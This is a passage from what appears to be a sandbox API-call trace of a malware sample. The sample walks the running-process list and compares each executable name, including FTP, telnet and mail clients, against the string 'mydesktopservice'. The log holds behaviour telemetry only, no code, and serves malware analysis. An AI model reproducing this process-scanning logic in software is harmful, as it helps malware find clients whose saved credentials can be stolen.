lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0094.188] StrStrIA (lpFirst="references compounds.exe", lpSrch="mydesktopservice") returned 0x0 [0094.188] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0094.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.189] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3569988 [0094.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3569988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0094.189] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0094.189] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="mydesktopservice") returned 0x0 [0094.189] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0094.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.190] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3569a48 [0094.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3569a48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0094.190] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0094.190] StrStrIA (lpFirst="registered try.exe", lpSrch="mydesktopservice") returned 0x0 [0094.191] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0094.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0094.192] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356a538 [0094.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356a538, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0094.192] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0094.192] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="mydesktopservice") returned 0x0 [0094.192] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0094.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.194] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356a1b8 [0094.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x356a1b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0094.194] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0094.194] StrStrIA (lpFirst="invite.exe", lpSrch="mydesktopservice") returned 0x0 [0094.194] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0094.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.195] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3569fc0 [0094.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3569fc0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0094.195] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0094.195] StrStrIA (lpFirst="idol.exe", lpSrch="mydesktopservice") returned 0x0 [0094.195] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0094.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0094.197] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356a678 [0094.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356a678, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0094.197] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0094.197] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="mydesktopservice") returned 0x0 [0094.197] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0094.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0094.198] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356a6a0 [0094.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356a6a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0094.198] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0094.198] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="mydesktopservice") returned 0x0 [0094.198] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0094.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.200] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356a140 [0094.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x356a140, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0094.200] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0094.200] StrStrIA (lpFirst="powell_jane.exe", lpSrch="mydesktopservice") returned 0x0 [0094.200] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0094.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.201] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3569a68 [0094.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3569a68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0094.201] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0094.201] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="mydesktopservice") returned 0x0 [0094.201] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0094.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.202] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356a170 [0094.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x356a170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0094.203] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0094.203] StrStrIA (lpFirst="gainedshape.exe", lpSrch="mydesktopservice") returned 0x0 [0094.203] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0094.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.204] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35699a8 [0094.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x35699a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0094.204] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0094.204] StrStrIA (lpFirst="opens-versions.exe", lpSrch="mydesktopservice") returned 0x0 [0094.204] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0094.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0094.214] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356a5b0 [0094.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356a5b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0094.214] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0094.214] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="mydesktopservice") returned 0x0 [0094.214] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0094.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.216] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356a1a0 [0094.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x356a1a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0094.216] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0094.216] StrStrIA (lpFirst="3dftp.exe", lpSrch="mydesktopservice") returned 0x0 [0094.216] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0094.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.217] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3569a88 [0094.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3569a88, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0094.218] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0094.218] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="mydesktopservice") returned 0x0 [0094.218] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0094.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.219] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3569f90 [0094.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3569f90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0094.219] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0094.219] StrStrIA (lpFirst="alftp.exe", lpSrch="mydesktopservice") returned 0x0 [0094.219] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0094.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.220] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356a0f8 [0094.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x356a0f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0094.220] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0094.220] StrStrIA (lpFirst="barca.exe", lpSrch="mydesktopservice") returned 0x0 [0094.220] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0094.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.222] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3569ff0 [0094.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3569ff0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0094.222] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0094.222] StrStrIA (lpFirst="bitkinex.exe", lpSrch="mydesktopservice") returned 0x0 [0094.222] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0094.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.223] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356a008 [0094.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x356a008, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0094.223] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0094.223] StrStrIA (lpFirst="coreftp.exe", lpSrch="mydesktopservice") returned 0x0 [0094.223] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0094.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0094.224] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35479d8 [0094.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x35479d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0094.224] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0094.224] StrStrIA (lpFirst="far.exe", lpSrch="mydesktopservice") returned 0x0 [0094.225] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0094.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.226] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356a0b0 [0094.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x356a0b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0094.226] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0094.226] StrStrIA (lpFirst="filezilla.exe", lpSrch="mydesktopservice") returned 0x0 [0094.226] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0094.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.227] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356a050 [0094.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x356a050, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.227] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0094.228] StrStrIA (lpFirst="flashfxp.exe", lpSrch="mydesktopservice") returned 0x0 [0094.228] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0094.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.229] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356a0c8 [0094.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x356a0c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0094.229] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0094.229] StrStrIA (lpFirst="fling.exe", lpSrch="mydesktopservice") returned 0x0 [0094.229] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0094.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.230] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 